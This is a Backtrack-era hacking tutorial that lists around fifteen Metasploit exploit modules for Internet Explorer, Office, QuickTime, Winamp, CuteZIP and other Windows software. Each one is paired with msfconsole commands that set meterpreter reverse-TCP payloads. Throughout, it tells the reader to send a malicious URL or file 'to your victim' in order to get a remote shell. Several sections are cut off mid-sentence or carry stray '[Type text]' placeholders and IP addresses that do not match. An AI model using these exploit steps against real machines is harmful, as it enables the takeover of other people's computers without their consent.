Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath hack.flv (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit

[Type text]


Attacting On Remote Windows PC in LAN using Internet Explorer DHTML

Behaviors :

This module exploits a use-after-free vulnerability within the DHTML behaviors

functionality of Microsoft Internet Explorer versions 6 and 7. This bug was

discovered being used in-the-wild and was previously known as the “iepeers”

vulnerability. The name comes from Microsoft’s suggested workaround to block

access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when

trying to persist an object using the setAttribute, which end up calling

VariantChangeTypeEx with both the source and the destination being the same

variant. So if you send as a variant an IDISPATCH the algorithm will try to do a

VariantClear of the destination before using it. This will end up on a call to

PlainRelease which deref the reference and clean the object.” NOTE: Internet

Explorer 8 and Internet Explorer 5 are not affected.


use exploit/windows/browser/ms10_018_ie_behaviors

Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.42.31 (IP of Local Host)

Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.42.31 (This must be an address on

the local machine)

Msf exploit (ms10_018_ie_behaviors)>set uripath ie (The Url to use for this exploit)

Msf exploit (ms10_018_ie_behaviors)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 80/ie




[Type text]


Attacting On Remote Windows XP PC using Internet Explorer Winhlp32.exe

MsgBox Code Execution :

This module exploits a code execution vulnerability that occurs when a user

presses F1 on Message Box originated from VBscript within a web page. When the

user hits F1, the Message Box help functionality will attempt to load and use a

HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.

This particular version of the exploit implements a WebDAV server that will serve

HLP file as well as a payload EXE. During testing warnings about the payload EXE

being unsigned were witnessed. A future version of this module might use other

methods that do not create such a warning.


use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32

Msf exploit (ms10_022_ie_vbscript_winhlp32)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_022_ie_vbscript_winhlp32)>set lhost 192.168.42.31 (IP of Local Host)

Msf exploit (ms10_022_ie_vbscript_winhlp32)>set srvhost 192.168.42.31 (This must be an address


Msf exploit (ms10_022_ie_vbscript_winhlp32)>set uripath / (The Url to use for this exploit)

Msf exploit (ms10_022_ie_vbscript_winhlp32)>exploit

Now an URL you should give to your victim http:// 192.168.42.131




[Type text]


Attacting On Remote Windows PC using Internet Explorer CSS Set User Clip

Memory Corruption Exploit :

This module exploits memory corruption vulnerability within Microsoft’s HTML engine

(mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory

corruption occurs that can lead arbitrary code execution. It seems like Microsoft code

inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s

function pointers. This leads to the program counter being set to the address determined by

the address “*vtable+0x30+1+“. The particular address depends on the exact version of the

mshtml library in use. Since the address depends on the version of mshtml, some versions may

not be exploitable. Specifically, those ending up with a program counter value within another

module, in kernel space, or just not able to be reached with various memory spraying

techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to

bypass non-executable memory protections.


use exploit/windows/browser/ms10_090_ie_css_clip

Msf exploit (ms10_090_ie_css_clip)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_090_ie_css_clip)>set lhost 192.168.42.31 (IP of Local Host)

Msf exploit (ms10_090_ie_css_clip)>set srvhost 192.168.42.31 (This must be an address on the

local machine)

Msf exploit (ms10_090_ie_css_clip)>set uripath clips (The Url to use for this exploit)

Msf exploit (ms10_090_ie_css_clip)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/clips




[Type text]


Attacting On Remote Windows PC Using Internet Explorer 7 CFunction Pointer

Uninitialized Memory Corruption :

This module exploits an error related to the CFunctionPointer function when

attempting to access uninitialized memory. A remote attacker could exploit this

vulnerability to corrupt memory and execute arbitrary code on the system with

the privileges of the victim.


use exploit/windows/browser/ms09_002_memory_corruption

Msf exploit (ms09_002_memory_corruption)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms09_002_memory_corruption)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (ms09_002_memory_corruption)>set srvhost 192.168.42.131 (This must be an address


Msf exploit (ms09_002_memory_corruption)>set uripath ie (The Url to use for this exploit)

Msf exploit (ms09_002_memory_corruption)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 80/ie




[Type text]


Attacting On Remote Windows PC Using Apple QuickTime 7.7.2 TeXML Style

Element font-table Field Stack Buffer Overflow :

This module exploits a vulnerability found in Apple QuickTime. When handling a

TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain

arbitrary code execution under the context of the user. This is due to the

QuickTime3GPP.gtx component not handling certain Style subfields properly, as

the font-table field, which is used to trigger the overflow in this module. Because

of QuickTime restrictions when handling font-table fields, only 0×31-0×39 bytes

can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been

provided. The module has been tested successfully on IE6 and IE7 browsers

(Windows XP and Vista).


use exploit/windows/browser/apple_quicktime_texml_font_table

msf exploit (apple_quicktime_texml_font_table)>set payload


msf exploit (apple_quicktime_texml_font_table)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (apple_quicktime_texml_font_table)>set srvhost 192.168.42.131 (This must be an


msf exploit (apple_quicktime_texml_font_table)>set uripath /(The Url to use for this exploit)

msf exploit (apple_quicktime_texml_font_table)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 8080/




[Type text]


Attacting On Remote Windows PC Using gAlan 0.2.1 Buffer Overflow :

This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially

crafted galan file.


use exploit/windows/fileformat/galan_fileformat_bof

msf exploit (galan_fileformat_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (galan_fileformat_bof)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (galan_fileformat_bof)>exploit

After we successfully generate the malicious galan File, it will stored on your local computer

/root/.msf4/local/msf.galan



Now send your msf.galan files to victim, as soon as they download and open it. Now you can

access meterpreter shell on victim computer.



set lhost 192.168.42.131

exploit

[Type text]


Attacting On Remote Windows PC Using Orbit Downloader URL Unicode

Conversion Overflow :

This module exploits a stack-based buffer overflow in Orbit Downloader. The

vulnerability is due to Orbit converting an URL ascii string to unicode in a insecure

way with Multi ByteTo Wide Char. The vulnerability is exploited with a specially

crafted metalink file that should be opened with Orbit through the “File->Add

Metalink…” option.


use exploit/windows/fileformat/orbit_download_failed_bof

msf exploit (orbit_download_failed_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (orbit_download_failed_bof)>set lhost 192.168.1.4 (IP of Local Host)

msf exploit (orbit_download_failed_bof)>exploit

After we successfully generate the malicious metalink File, it will stored on your local computer

/root/.msf4/local/msf.metalink



Now send your msf.metalink files to victim, as soon as they download and open it. Now you

can access meterpreter shell on victim computer.



set lhost 192.168.42.131

exploit

[Type text]


Attacting On Remote Windows PC Using Open VPN Trusted Path Privilege

Escalation :

This module exploits a logic flaw due to how the lpApplicationName parameter is

handled. When the lpApplicationName contains a space, the file name is

ambiguous. Take this file path as example: C:program fileshello.exe; The Windows

API will try to interpret this as two possible paths: C:program.exe, and C:program

fileshello.exe, and then execute all of them. To some software developers, this is

an unexpected behavior, which becomes a security problem if an attacker is able

to place a malicious executable in one of these unexpected paths, sometimes

escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1,

OpenSSH Server 5, and others have the same problem. The offensive technique is

also described in Writing Secure Code (2nd Edition), Chapter 23, in the section

“Calling Processes Security” on page 676.


use exploit/windows/local/trusted_service_path

msf exploit (trusted_service_path)>set payload windows/meterpreter/reverse_tcp

msf exploit (trusted_service_path)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (trusted_service_path)>set lport 4443 (Port of the local machine)

msf exploit (trusted_service_path)>set session 1

msf exploit (trusted_service_path)>exploit





[Type text]


Attacting On Remote Windows PC Using Winamp MAKI Buffer Overflow :

This module exploits a stack based buffer overflow in Winamp 5.55. The flaw

exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,

where memmove is used within a insecure way with user controlled data. To

exploit the vulnerability the attacker must convince the attacker to install the

generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin,

or generate a new skin using the crafted mcvcore.maki file. The module has been

tested successfully on Windows XP SP3 and Windows 7 SP1.


use exploit/windows/fileformat/winamp_maki_bof

msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (winamp_maki_bof)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (winamp_maki_bof)>exploit

After we successfully generate the malicious maki File, it will stored on your local computer

/root/.msf4/local/mcvcore.maki



Now send your mcvcore.maki files to victim, as soon as they download and open it. Now you

can access meterpreter shell on victim computer.



set lhost 192.168.42.131

exploit

[Type text]


Attacting On Remote Windows PC Using Microsoft Office word MS12-027

MSCOMCTL ActiveX Buffer Overflow :

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a

malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control

as exploited in the wild on April 2012. This module targets Office 2007 and Office

2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP

chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after

office got load, so the malicious file must be loaded through “File / Open” to

achieve exploitation.


use exploit/windows/fileformat/ms12_027_mscomctl_bof

msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (ms12_027_mscomctl_bof)>exploit

After we successfully generate the malicious doc File, it will stored on your local computer

/root/.msf4/local/msf.doc





set lhost 192.168.42.131

exploit

[Type text]


Now send your msf.doc files to victim, as soon as they download and open it. Now you can


Attacting On Remote Windows PC Using global SCAPE Cute ZIP Stack Buffer

Overflow :

This module exploits stack-based buffer overflow vulnerability in version 2.1 of

CuteZIP. In order for the command to be executed, an attacker must convince the

target user to open a specially crafted zip file with CuteZIP. By doing so, an

attacker can execute arbitrary code as the target user.


use exploit/windows/fileformat/cutezip_bof

msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (cutezip_bof)>set lhost 192.168.42.131 (IP of Local Host)

msf exploit (cutezip_bof)>exploit

After we successfully generate the malicious ZIP File, it will stored on your local computer

/root/.msf4/local/msf.zip





set lhost 192.168.42.131

exploit

[Type text]


Now send your msf.zip files to victim, as soon as they download and open it. Now you can

access meterpreter shell

Attacting On Remote Windows PC Using Simple Web Server Connection Header

Buffer Overflow :

This module exploits vulnerability in Simple Web Server 2.2 rc2. A remote user

can send a long string data in the Connection Header to causes an overflow on the

stack when function vsprintf () is used, and gain arbitrary code execution. The

module has been tested successfully on Windows 7 SP1 and Windows XP SP3…


use exploit/windows/http/sws_connection_bof

msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp

msf exploit(sws_connection_bof) > set lhost 192.168.42.131 [IP of Local Host]

msf exploit(sws_connection_bof) > set rhost 192.168.1.7 [IP of Victim PC]

msf exploit(sws_connection_bof) > exploit





[Type text]


Attacting On Remote Windows 7 PC Using Microsoft XML Core Services MSXML

Uninitialized Memory Corruption :

This module exploits a memory corruption flaw in Microsoft XML Core Services

when trying to access an uninitialized Node with the get Definition API, which may

corrupt memory allowing remote code execution.


use exploit/windows/browser/msxml_get_definition_code_exec

Msf exploit (msxml_get_definition_code_exec)>set payload windows/meterpreter/reverse_tcp

Msf exploit (msxml_get_definition_code_exec)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (msxml_get_definition_code_exec)>set srvhost 192.168.42.131 (This must be an address on

the local machine)

Msf exploit (msxml_get_definition_code_exec)>set uripath / (The Url to use for this exploit)

Msf exploit (msxml_get_definition_code_exec)>exploit

Now an URL you should give to your victim http:// 192.168.42.131:8080/




[Type text]


Attacting On Remote Windows 7 PC Using Poison Ivy 2.3.2 C&C Server Buffer

Overflow :

This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The

exploit does not need to know the password chosen for the bot/server

communication. If the C&C is configured with the default ‘admin’ password, the

exploit should work fine. In case of the C&C configured with another password

the exploit can fail. The ‘check’ command can be used to determine if the C&C

target is using the default ‘admin’ password. Hopefully an exploit try won’t crash

the Poison Ivy C&C process, just the thread responsible of handling the

connection. Because of this the module provides the RANDHEADER option and a

bruteforce target. If RANDHEADER is used a random header will be used. If the

brute force target is selected, a random header will be sent in case the default for

the password ‘admin’ doesn’t work. Bruteforce will stop after 5 tries or a session

obtained.


use exploit/windows/misc/poisonivy_bof

Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (poisonivy_bof)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (poisonivy_bof)>set rhost 192.168.12.119 (IP of Victim PC)

Msf exploit (poisonivy_bof)>exploit





[Type text]


Attacting On Remote Windows PC Using Apple QuickTime TeXML Stack Buffer

Overflow :

This module exploits a vulnerability found in Apple QuickTime. When handling a

TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain

arbitrary code execution under the context of the user. The flaw is generally

known as a bug while processing the ‘transform’ attribute, however, that attack

vector seems to only cause a Terminate Process call due to a corrupt stack cookie,

and more data will only trigger a warning about the malformed XML file. This

module exploits the ‘color’ value instead, which accomplishes the same thing.


use exploit/windows/fileformat/apple_quicktime_texml

Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp

Msf exploit (apple_quicktime_texml)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3 (Victim IP)

Msf exploit (apple_quicktime_texml)>show targets

Msf exploit (apple_quicktime_texml)>set target 0

Msf exploit (apple_quicktime_texml)>exploit

After we successfully generate the malicious File, it will stored on your local computer

/root/.msf4/local/msf.xml



[Type text]


Now send your msf.xml files to victim, as soon as they download and open it. Now you can


Attacting On Remote Windows PC Using Microsoft Office Click Once

Unsafe Object Package Handling Vulnerability :

This module exploits a vulnerability found in Microsoft Office’s Click Once feature.

When handling a Macro document, the application fails to recognize certain file

extensions as dangerous executables, which can be used to bypass the warning

message. This allows you to trick your victim into opening the malicious

document, which will load up either a python or ruby payload based on your

choosing, and then finally download and execute our executable.


use exploit/windows/fileformat/ms12_005

Msf exploit (ms12_005)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_005)>set lhost 192.168.42.131 (IP of Local Host)

Msf exploit (ms12_005)>exploit



set lhost 192.168.42.131

exploit

[Type text]


After we successfully generate the malicious Document File, it will stored on your local

computer

/root/.msf4/local/msf.docm

Now send your msf.docm files to victim, as soon as they download and open it. Now you can


[Type text]


Tnx All Dears For Reading This Article

By Red H4t V!per

back track tutorials

Documents